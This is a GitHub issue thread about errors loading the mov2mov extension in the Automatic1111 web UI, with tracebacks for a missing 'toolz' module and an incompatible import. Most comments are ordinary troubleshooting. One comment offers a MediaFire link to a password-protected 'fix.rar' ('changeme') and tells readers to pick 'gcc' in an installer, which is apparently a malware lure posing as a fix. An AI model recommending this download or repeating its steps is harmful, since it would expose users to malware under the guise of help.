### ISSUE TITLE
Error installing mov2mov in Automatic1111 that installed by Pinokio

### ISSUE THREAD

**Issue by DAWiguna** [Scholar01/sd-webui-mov2mov#159]
After installing the mov2mov extension and rerun, the terminal show this error:

*** Error loading script: mov2mov.py
    Traceback (most recent call last):
      File "D:\pinokio\api\automatic1111.git\app\modules\scripts.py", line 515, in load_scripts
        script_module = script_loading.load_module(scriptfile.path)
      File "D:\pinokio\api\automatic1111.git\app\modules\script_loading.py", line 13, in load_module
        module_spec.loader.exec_module(module)
      File "<frozen importlib._bootstrap_external>", line 883, in exec_module
      File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
      File "D:\pinokio\api\automatic1111.git\app\extensions\sd-webui-mov2mov\scripts\mov2mov.py", line 24, in <module>
        from ebsynth import EbsynthGenerate, Keyframe
      File "D:\pinokio\api\automatic1111.git\app\extensions\sd-webui-mov2mov\ebsynth\__init__.py", line 2, in <module>
        from .ebsynth_generate import EbsynthGenerate, Keyframe, Sequence, EbSynthTask
      File "D:\pinokio\api\automatic1111.git\app\extensions\sd-webui-mov2mov\ebsynth\ebsynth_generate.py", line 5, in <module>
        from toolz import groupby
    ModuleNotFoundError: No module named 'toolz'

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sawaaki** [comment]
I am the same. Please help me.

**Comment by Andersen1729** [comment]
Me too

**Comment by QuentinRiviere** [comment]
See my comment : https://github.com/Scholar01/sd-webui-mov2mov/issues/158#issuecomment-2332817472

**Comment by sawaaki** [comment]
Thank you!!!! I can use it now!

**Comment by omidud** [comment]
*** Error loading script: m2m_ui.py
    Traceback (most recent call last):
      File "C:\python_projects\stable-diffusion-webui-master\modules\scripts.py", line 515, in load_scripts
        script_module = script_loading.load_module(scriptfile.path)
      File "C:\python_projects\stable-diffusion-webui-master\modules\script_loading.py", line 13, in load_module
        module_spec.loader.exec_module(module)
      File "<frozen importlib._bootstrap_external>", line 883, in exec_module
      File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
      File "C:\python_projects\stable-diffusion-webui-master\extensions\sd-webui-mov2mov\scripts\m2m_ui.py", line 23, in <module>
        from modules.ui import (
    ImportError: cannot import name 'create_sampler_and_steps_selection' from 'modules.ui' (C:\python_projects\stable-diffusion-webui-master\modules\ui.py)

---

**Comment by ztlsir** [comment]
> *** Error loading script: m2m_ui.py Traceback (most recent call last): File "C:\python_projects\stable-diffusion-webui-master\modules\scripts.py", line 515, in load_scripts script_module = script_loading.load_module(scriptfile.path) File "C:\python_projects\stable-diffusion-webui-master\modules\script_loading.py", line 13, in load_module module_spec.loader.exec_module(module) File "", line 883, in exec_module File "", line 241, in _call_with_frames_removed File "C:\python_projects\stable-diffusion-webui-master\extensions\sd-webui-mov2mov\scripts\m2m_ui.py", line 23, in from modules.ui import ( ImportError: cannot import name 'create_sampler_and_steps_selection' from 'modules.ui' (C:\python_projects\stable-diffusion-webui-master\modules\ui.py)

how to fix it?i think its not support lastest sd ui
